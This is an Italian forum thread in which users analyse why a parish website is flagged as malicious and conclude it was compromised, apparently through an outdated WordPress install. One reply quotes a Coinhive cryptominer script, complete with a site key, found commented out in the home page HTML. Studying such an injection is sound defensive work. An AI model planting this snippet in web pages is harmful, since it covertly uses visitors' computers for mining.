Discussione Aiuto per rimozione malware....

Stato
Discussione chiusa ad ulteriori risposte.

Eoloprox

Utente Emerald
20 Marzo 2016
605
150
51
415
Ultima modifica:
Salve a tutti,

Mi chiedevo se potevate aiutarmi nell’analisi tecnica di un sito internet, che mi rileva la presenza di malware il mio KasperSKY, allego uno screen della prova...
Non riesco a capire di cosa si tratta nello specifico, cosi da aiutare l'hosting e il creaotore del sito a risolvere la problematica... grazie

222.png


Malware al link attenzione


Rettifico subito, dal link diretto non sussite problema, forse e più grossa la storia....Il malware si presenta solo tramite ricerca da google... che succede?

Immagine 2023-07-20 151335.png



Aggiungo un dettaglio, sto usando una sim VERY-MOBILE.
 
così su due piedi (non ho ancora guardato nel dettaglio) le cose possono essere due o tre:
  • SEO Poisoning - la pagina indicizzata in realtà appartiene ad un altro sito che sta "spoofando" quello legittimo (difficile che sia questo)
  • li hanno pwnati (probabile, soprattutto guardando i risultati su questa pagina https://www.comunionetorredeicorsari.it/archived/)
  • takeover/problemi di qualche tipo coi DNS

provo a dare un'occhiata un po' meglio
 
Per me li hanno pwnati. Tra l'altro casca pure a pennello con la pubblicazione di un tool da perte di alcuni miei amici per la messa in sicurezza di siti wordpress. Il tool si chiama https://pwnpress.io/, consiglierei loro di installarlo e di verificare che non siano stati bucati.

La cosa strana e che non riesco a riprodurre in maniera costante la casistica, a volte mi redirige sul sito malevolo, altre volte no
 
Si ho ho notato anche io, io lo deduco dall'antivirus della rete, su very lo becca, sulla ho. mobile non lo vede +...
Se li avessero pwnati quali sono i rischi intercorsi?
 
Salve a tutti,

Mi chiedevo se potevate aiutarmi nell’analisi tecnica di un sito internet, che mi rileva la presenza di malware il mio KasperSKY, allego uno screen della prova...
Non riesco a capire di cosa si tratta nello specifico, cosi da aiutare l'hosting e il creaotore del sito a risolvere la problematica... grazie

Visualizza allegato 70732

Malware al link attenzione


Rettifico subito, dal link diretto non sussite problema, forse e più grossa la storia....Il malware si presenta solo tramite ricerca da google... che succede?

Visualizza allegato 70733


Aggiungo un dettaglio, sto usando una sim VERY-MOBILE.
Penso che riguardi https ssl certificati scaduti, avranno modificato qualcosa (per errore) parlo della persona che gestisce il sito lato hosting.
 
ok non mi ero accorto, li hanno pwnati

Nella home page c'è questo script commentato, probabilmente server side c'è qualcosa che lo un-commenta in base a qualche parametro
HTML:
<!-- <script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous("wNca6sxwp2SVi0ye8ptXaxvPfvbYT1Zf");miner.start({threads:2,throttle: 0});</script> -->
 
è un collegamento a materiale malevolo? Leggo miner... azz

Un numero di thread più alto e/o un numero di accelerazione più basso comporteranno un maggiore utilizzo della CPU nel browser del client. Con una percentuale di occupazione della CPU più elevata, gli utenti finali probabilmente sperimenteranno un comportamento lento e una scarsa esperienza sui siti web.
 
è un collegamento a materiale malevolo? Leggo miner... azz

Un numero di thread più alto e/o un numero di accelerazione più basso comporteranno un maggiore utilizzo della CPU nel browser del client. Con una percentuale di occupazione della CPU più elevata, gli utenti finali probabilmente sperimenteranno un comportamento lento e una scarsa esperienza sui siti web.
yes, stavo cercando di capire in che modo l'avessero bucato ma tra poco devo uscire.
Ho visto che comunque usano una versione vecchia di WordPress con delle vulnerabilità note, suggerirei loro di aggiornare all'ultima versione (e agigornare anche gli eventuali plugin)
 
Faccio le conlusioni, hanno messo dentro il download id un miner che fa riferimento alla piattaforma che le consente di minare in remoto sulla macchina infetta..... Detto ciò se è commentata la stringa non viene saltata? Questo non mi e chiaro
 
Faccio le conlusioni, hanno messo dentro il download id un miner che fa riferimento alla piattaforma che le consente di minare in remoto sulla macchina infetta..... Detto ciò se è commentata la stringa non viene saltata? Questo non mi e chiaro
Sì, lo script dovrebbe essere ignorato, ma probabilmente c'è qualche modo che permetta di servire lo script senza il commento e di farlo quindi eseguire. Ma la questione è un po' più complicata, a quanto pare il sito è stato bucato un po' di tempo fa (non so quando), ma attualmente il miner è disattivo e il dominio che conteneva il codice malevolo per minare è stato acquistato da un ricercatore che sta cercando di fare awarness (in sostanza il miner non è più attivo).

Quindi sono in realtà al punto di partenza, non capisco come sia stato possibile che le prime due o tre volte che ho visitato il sito sia stato re-diretto su dei siti spam
 
Stato
Discussione chiusa ad ulteriori risposte.